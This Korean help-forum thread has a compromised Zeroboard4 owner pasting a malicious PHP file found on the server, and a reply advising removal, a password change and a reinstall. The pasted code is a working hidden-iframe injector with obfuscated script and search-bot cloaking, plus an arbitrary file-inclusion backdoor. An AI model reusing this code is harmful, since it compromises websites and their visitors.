묻고답하기
제로보드4 사용자권한에러 정말 급합니다 도와주세요T_T ((해결안됬어요
2009.10.22 16:47
오늘 새벽까지만해도 잘 들어가지던 홈페이지가 오늘 아침에 들어갔더니
게시판 바로 들어갔거든요? 근데 원래 바로 게시판 글 목록이 보여야 하는데 로그인하라는게 뜨더라구요.
그래서 로그인하면 사용권한이 없다그러고;; 게시판 다 그러더라구요
그러다가 관리자 홈페이지에 들어갔는데, 들어가지기는하는데
제 게시판 목록? 이라고 해야하나 그거 클릭하면
Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php/pear') in /web/home/sedae/html/bbs/PEE4FF8A344E81.php on line 57
이렇게 뜹니다.
ftp에서 bbs/data 권한설정도 해봤구요. ftp에서 세션비우기도 했구요.
근데 제로보드 관리자페이지에서 세션비우기 해도 위와 같은 말이 뜨더라구요.
제 호스팅 제공해주는 사이트에서 문의까지해봤지만 그분들도 따로 어찌 못하겠다는식으로 말씀하시더라구요;
어쩌면 좋죠??
도와주세요 ㅠㅠㅠ
<?php
$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
@chdir($dir);
$dir = getcwd();
@chdir($curDir);
return $dir;
}
function is_search_bot($agent)
{
if(
strstr($agent, "Yandex/") != null ||
strstr($agent, "YaDirectBot") != null ||
strstr($agent, "James Bond") != null ||
strstr($agent, "Googlebot") != null ||
strstr($agent, "Mediapartners-Google") != null ||
strstr($agent, "StackRambler") != null ||
strstr($agent, "Slurp") != null ||
strstr($agent, "msnbot") != null
)
{
return true;
}
return false;
}
function callback($data)
{
global $frame_code;
$data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);
$data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
$data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);
if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
return $data;
} else {
if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
}
else {
return $data.$frame_code;
}
}
}
if(@ob_start('callback') == true) {
$file = $_GET['qq'];
@chdir(get_file_dir_($file));
include($file);
} else {
echo $frame_code;
}
?>
lattente님 일단 저걸 지우면 404에러가 떠요 홈페이지 표시가 안되구요. 제로보드 관리자도 404에러가 떠요 ㅠㅠ 저 파일이 있을때는 제로보드 로그인 까지는 되는데 다른건 다 저 오류뜨구요 ㅠㅠ
댓글 1
-
lattente
2009.10.22 18:21
-
건면세대
2009.10.22 18:29
일단 저걸 지우면 404에러가 떠요 홈페이지 표시가 안되구요. 제로보드 관리자도 404에러가 떠요 ㅠㅠ 저 파일이 있을때는 제로보드 로그인 까지는 되는데 다른건 다 저 오류뜨구요 ㅠㅠ
PEE4FF8A344E81.php 이 파일 건면세대님 사이트 관련 파일인가요? 파일이름이 영 수상한데 제 생각엔 침입 당하신듯합니다.
저 파일 57번 라인에서 아마 외부에 있는 파일을 include 하려고 시도한듯한데요. 호스팅 업체 대다수가 외부파일은 include 안되도록
막아놓습니다. 해서- 발생하는 오류 같네요. 해당 파일 사용하시는 파일인지 확인하시구요- 아니면 지워버리시고- 저 파일 참조하는
코드 다 확인해서 지우세요- 다 하시고 난 다음엔 ftp 비밀번호 변경하시구요- 가장 확실한건 백업하시고- 밀고 다시 설치하세요.
호스팅 계정 자체가 크랙킹당한게 아니라 제로보드에 코드삽입 당한거라면 그렇게만 해도 일단 해결은 되실꺼에요- 그리고 제로보드4는 여러가지 취약점이 많기 때문에 복구 하셔도 다시 같은 문제가 발생할 수 있다는걸 염두하셔야해요- 호스팅업체에서 웹방화벽이라도 돌려준다면 조금 상황은 나아질지 모르지만요- 수고하세요-